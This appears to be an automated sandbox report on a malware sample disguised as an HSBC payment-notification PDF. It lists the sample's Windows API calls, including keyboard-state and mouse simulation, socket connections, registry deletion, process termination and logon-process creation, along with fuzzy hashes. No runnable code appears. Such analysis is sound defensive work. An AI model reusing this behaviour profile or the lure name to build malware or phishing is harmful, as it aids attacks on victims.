• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
• Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
• Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
• Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
• Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
• Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
• Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
• EnterCriticalSection.KERNEL32(?), ref: 00467130
• _memmove.LIBCMT ref: 0046717E
• _memmove.LIBCMT ref: 0046719B
• LeaveCriticalSection.KERNEL32(?), ref: 004671AA
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
• InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: 91fe55520eadb1a7270c94a8a07a9ee0fef937bad63877067fb5a25429b7f735
• Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
• Opcode Fuzzy Hash: 91fe55520eadb1a7270c94a8a07a9ee0fef937bad63877067fb5a25429b7f735
• Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
APIs
• DeleteObject.GDI32(00000000), ref: 004861EB
• GetDC.USER32(00000000), ref: 004861F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
• ReleaseDC.USER32(00000000,00000000), ref: 0048620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
• Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
• Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
• Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
APIs
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
• _wcstok.LIBCMT ref: 0046EC94
• _wcscpy.LIBCMT ref: 0046ED23
• _memset.LIBCMT ref: 0046ED56
Strings
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 5a493bde25eaa50a4205b4a7b6ef268e3949634531009b61581ff7284a2c8f1f
• Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
• Opcode Fuzzy Hash: 5a493bde25eaa50a4205b4a7b6ef268e3949634531009b61581ff7284a2c8f1f
• Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
APIs
• __WSAFDIsSet.WSOCK32(00000000,?), ref: 00476C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
• WSAGetLastError.WSOCK32(00000000), ref: 00476C34
• htons.WSOCK32(?), ref: 00476CEA
• inet_ntoa.WSOCK32(?), ref: 00476CA7
  • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
  • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
• _strlen.LIBCMT ref: 00476D44
• _memmove.LIBCMT ref: 00476DAD
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3619996494-0
                                                                                                                                                    • Opcode ID: 0c021546857269730462b0aef7fbe808168544cd7cd5e6da4896c9d16d032430
                                                                                                                                                    • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                                                                                                                                    • Opcode Fuzzy Hash: 0c021546857269730462b0aef7fbe808168544cd7cd5e6da4896c9d16d032430
                                                                                                                                                    • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
• Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
• Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
• Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
APIs
• IsWindow.USER32(00A81188), ref: 0048B3EB
• IsWindowEnabled.USER32(00A81188), ref: 0048B3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
• SendMessageW.USER32(00A81188,000000B0,?,?), ref: 0048B512
• IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
• GetWindowLongW.USER32(00A81188,000000EC), ref: 0048B571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
• Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
• Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
• Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
APIs
• _memset.LIBCMT ref: 0047F448
• _memset.LIBCMT ref: 0047F511
• ShellExecuteExW.SHELL32(?), ref: 0047F556
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
• GetProcessId.KERNEL32(00000000), ref: 0047F5CD
• CloseHandle.KERNEL32(00000000), ref: 0047F5FC
Strings
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: 8b3da71be9337afea30d29a7ff14a4b93a0b57cf0db593304da16a2e435ab00b
• Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
• Opcode Fuzzy Hash: 8b3da71be9337afea30d29a7ff14a4b93a0b57cf0db593304da16a2e435ab00b
• Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
APIs
• GetParent.USER32(?), ref: 00460F8C
• GetKeyboardState.USER32(?), ref: 00460FA1
• SetKeyboardState.USER32(?), ref: 00461002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
• Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
• Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
• Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
APIs
• GetParent.USER32(00000000), ref: 00460DA5
• GetKeyboardState.USER32(?), ref: 00460DBA
• SetKeyboardState.USER32(?), ref: 00460E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
• Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
• Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
• Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
APIs
• _memset.LIBCMT ref: 004872AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
• IsMenu.USER32(?), ref: 00487369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
• DrawMenuBar.USER32 ref: 004873C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
• FreeLibrary.KERNEL32(00000000), ref: 004810B5
  • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
  • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
  • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
• GetWindowLongW.USER32(00A81188,000000F0), ref: 0048631F
• GetWindowLongW.USER32(00A81188,000000F0), ref: 00486354
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
APIs
  • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000), ref: 00477DB6
• socket.WSOCK32(00000002,00000001,00000006), ref: 004761C6
• WSAGetLastError.WSOCK32(00000000), ref: 004761D5
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
• connect.WSOCK32(00000000,?,00000010), ref: 00476217
• WSAGetLastError.WSOCK32 ref: 00476221
• closesocket.WSOCK32(00000000), ref: 0047624A
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
• GetProcAddress.KERNEL32(00000000), ref: 0042408C
• EncodePointer.KERNEL32(00000000), ref: 00424097
• DecodePointer.KERNEL32(00423F85), ref: 004240B2
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
APIs
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
• RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: cba2026341ca6da95bf0f4cc4549495cdff50bb95b91cfbe6af92d2dbe89bd00
• Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
• Opcode Fuzzy Hash: cba2026341ca6da95bf0f4cc4549495cdff50bb95b91cfbe6af92d2dbe89bd00
• Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
APIs
• VariantInit.OLEAUT32(?), ref: 0045EF06
• VariantClear.OLEAUT32(00000013), ref: 0045EF78
• VariantClear.OLEAUT32(00000000), ref: 0045EFD3
• _memmove.LIBCMT ref: 0045EFFD
• VariantClear.OLEAUT32(?), ref: 0045F04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
• Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
• Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
• Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
APIs
• _memset.LIBCMT ref: 00462258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
• IsMenu.USER32(00000000), ref: 004622C3
• CreatePopupMenu.USER32 ref: 004622F7
• GetMenuItemCount.USER32(000000FF), ref: 00462355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
• Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
• Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
• Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
  • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
• GetDesktopWindow.USER32 ref: 004770D6
• GetWindowRect.USER32(00000000), ref: 004770DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
  • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
• GetCursorPos.USER32(?), ref: 0047713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
• Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
• Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
• Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
APIs
  • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
  • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
  • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
  • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
  • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
• GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
• HeapAlloc.KERNEL32(00000000), ref: 004588DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
• GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
• HeapFree.KERNEL32(00000000), ref: 00458911
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3008561057-0
                                                                                                                                                    • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                                                                                    • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                                                                                                                    • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                                                                                    • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
• OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
• CloseHandle.KERNEL32(00000004), ref: 00458603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00467243
• EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
• TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
  • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
• LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
• UnloadUserProfile.USERENV(?,?), ref: 004589A9
• CloseHandle.KERNEL32(?), ref: 004589B2
• CloseHandle.KERNEL32(?), ref: 004589BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
• HeapFree.KERNEL32(00000000), ref: 004589CA
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
